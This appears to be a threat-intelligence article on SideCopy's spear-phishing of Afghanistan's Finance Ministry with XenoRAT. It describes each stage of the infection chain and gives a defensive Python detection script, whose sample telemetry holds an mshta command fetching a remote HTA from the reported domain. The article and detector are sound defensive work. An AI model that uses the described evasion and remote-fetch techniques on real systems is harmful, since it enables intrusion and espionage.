
SideCopy Launches Persistent XenoRAT Targeting Afghanistan’s Finance Ministry


Threat Actor SideCopy Targets Afghanistan’s Ministry of Finance with Spear-Phishing Campaign

A spear-phishing campaign attributed to SideCopy, a Pakistan-based threat actor that operates under the broader Transparent Tribe (APT36) umbrella, is targeting Afghanistan's Ministry of Finance (MoF). The targeting and lure material span all 34 provincial revenue directorates.

According to threat intelligence reporting from Seqrite, the campaign ultimately deploys a customized build of XenoRAT version 1.8.7. The implant beacons to infrastructure hosted with a European bulletproof hosting provider, which points to deliberate planning and operational maturity on the attackers' part.

The attack begins with a ZIP archive containing a malicious LNK file. The filename is not arbitrary: it is written in Pashto, one of Afghanistan's two official languages, and translates to "List of Employees Who Were Introduced to the Intellectual and Psychological Warfare Seminar." That attention to language indicates the actor understands its target environment, specifically government officials and provincial finance staff.

When the LNK is executed, the chain drops a decoy document: an extensive directory of provincial staff covering all 34 provinces, listing Finance Directors and Revenue Chiefs along with their direct mobile numbers, in both Dari and Pashto. This level of detail strongly suggests the actor carried out thorough reconnaissance before launching the campaign.

The infection chain is multi-staged and built to minimize on-disk artifacts and evade detection at several layers. The stages are:

  1. The LNK file launches mshta.exe as a living-off-the-land binary (LOLBin) to fetch a remote HTA payload from a compromised Afghan education domain, abimj[.]edu[.]af.

  2. The HTA delivers a heavily obfuscated JScript payload that uses hex-encoded string arrays and a custom Base64 decoding routine to load a malicious loader DLL.

  3. The loader is a .NET DLL that drops the decoy PDF and establishes persistence through a registry entry named "Edgre", a typosquat chosen to resemble Microsoft Edge.

  4. A second .NET shellcode loader downloads a payload (ayui.vmxx) and reconstructs it entirely in memory using VirtualAlloc() and CreateThread().

  5. Finally, the malware patches AmsiScanBuffer() to disable AMSI scanning, then uses Assembly.Load for reflective, fileless execution of the final stage.
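Two of these stages leave traces that ordinary host telemetry records: mshta.exe being launched with a remote URL (stage 1) and a Run-key value whose name is a near-miss of "Edge" (stage 3). The following Python is an added example, not code from the page or from Seqrite, showing detection rules for both, run over constructed Sysmon-style event records. Only the domain abimj[.]edu[.]af, the mshta.exe technique and the value name "Edgre" come from the report; the URL path, registry paths, SIDs and file paths are invented for illustration.

```python
"""Host-side detection for the staged chain above, run over constructed
Sysmon-style event records. Added example, not the page's or Seqrite's code;
event contents, URL path and registry paths are made up for illustration."""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass
class Event:
    event_id: int            # Sysmon semantics: 1 = process create, 13 = registry value set
    image: str = ""          # process image path (event 1)
    command_line: str = ""   # process command line (event 1)
    parent_image: str = ""   # parent process image path (event 1)
    target_object: str = ""  # registry path including value name (event 13)
    details: str = ""        # registry value data (event 13)


@dataclass
class Alert:
    rule: str
    stage: str
    evidence: str


REMOTE_URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# Matches ...\CurrentVersion\Run\<value name> and RunOnce under any hive prefix
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\([^\\]+)$", re.I)
LEGIT_EDGE_NAMES = ("edge", "msedge", "microsoftedge")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; 'edgre' is one insertion away from 'edge'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_edge_typosquat(value_name: str) -> bool:
    """True for near-misses of Edge-related names that are not the real names."""
    name = value_name.lower()
    if name in LEGIT_EDGE_NAMES:
        return False
    return any(edit_distance(name, legit) <= 2 for legit in LEGIT_EDGE_NAMES)


def rule_mshta_remote_hta(ev: Event) -> Optional[Alert]:
    """Stage 1: mshta.exe launched with a remote URL on its command line."""
    if ev.event_id != 1 or not ev.image.lower().endswith("\\mshta.exe"):
        return None
    url = REMOTE_URL_RE.search(ev.command_line)
    if not url:
        return None
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    note = " (parent explorer.exe, consistent with a double-clicked LNK)" if parent == "explorer.exe" else ""
    return Alert("mshta_remote_hta", "stage 1: LNK -> mshta.exe -> remote HTA", url.group(0) + note)


def rule_run_key_edge_typosquat(ev: Event) -> Optional[Alert]:
    """Stage 3: Run-key value whose name impersonates Microsoft Edge."""
    if ev.event_id != 13:
        return None
    m = RUN_KEY_RE.search(ev.target_object)
    if not m or not is_edge_typosquat(m.group(1)):
        return None
    return Alert("run_key_edge_typosquat", "stage 3: loader DLL persistence",
                 f"value '{m.group(1)}' -> {ev.details}")


RULES: List[Callable[[Event], Optional[Alert]]] = [rule_mshta_remote_hta, rule_run_key_edge_typosquat]


def run_rules(events: List[Event]) -> List[Alert]:
    """Apply every rule to every event and collect the alerts in event order."""
    alerts: List[Alert] = []
    for ev in events:
        for rule in RULES:
            alert = rule(ev)
            if alert is not None:
                alerts.append(alert)
    return alerts


# Constructed sample telemetry: two events mirroring the reported chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    Event(1, image=r"C:\Windows\System32\mshta.exe",
          command_line=r"mshta.exe https://abimj.edu.af/hypothetical/seminar.hta",  # URL path is invented
          parent_image=r"C:\Windows\explorer.exe"),
    Event(13, target_object=r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Edgre",
          details=r"C:\Users\Public\Edgre\loader.exe"),  # hypothetical loader path
    Event(1, image=r"C:\Windows\System32\mshta.exe",  # benign: local HTA, no remote URL
          command_line=r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
          parent_image=r"C:\Program Files\Vendor\installer.exe"),
    Event(13, target_object=r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_ABC",
          details=r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'),
]

if __name__ == "__main__":
    for a in run_rules(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.stage}: {a.evidence}")
```

The typosquat check deliberately whitelists the exact legitimate names and uses a small edit distance, so the real Edge auto-launch value is ignored while "Edgre" is flagged; tune the distance threshold and the legitimate-name list to the browsers actually deployed in your environment before using it in production.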

The chain culminates in XenoRAT 1.8.7, which connects to its command-and-control (C2) server over TCP using AES-encrypted and RTL-compressed traffic.

The implant enforces single-instance execution through a hardcoded mutex named "clouda". Once running, XenoRAT gives the operators a full post-exploitation toolkit, including keylogging, screen capture, webcam surveillance, and SOCKS5 tunneling through the victim host, which lets them pivot deeper into the target network.

Seqrite notes that the adoption of XenoRAT marks a shift for SideCopy toward tailored open-source malware, following earlier campaigns that relied on AsyncRAT. The delivery domain resolves into AS58469, so the first-stage download blends in with traffic to legitimate Afghan assets.

The RAT's C2 server sits with a Frankfurt-based bulletproof hosting provider that has been tied to other SideCopy infrastructure clusters, which points to an established ecosystem supporting the group's operations in the region.

Afghan government agencies should treat this as a prompt to harden their defenses. User awareness and training, together with strict email filtering that blocks or sandboxes ZIP attachments carrying LNK files, are the first line of defense against spear-phishing of this kind. Given the chain's reliance on mshta.exe, restricting or monitoring that binary with application control rules, and alerting on Run-key entries that impersonate browser names, would catch the early stages before the in-memory loaders run.

Understanding the tactics of groups like SideCopy remains essential for government institutions and private-sector organizations operating in exposed environments. Continuous monitoring and adaptive defenses are needed to mitigate the risk posed by multi-staged intrusions of this kind.
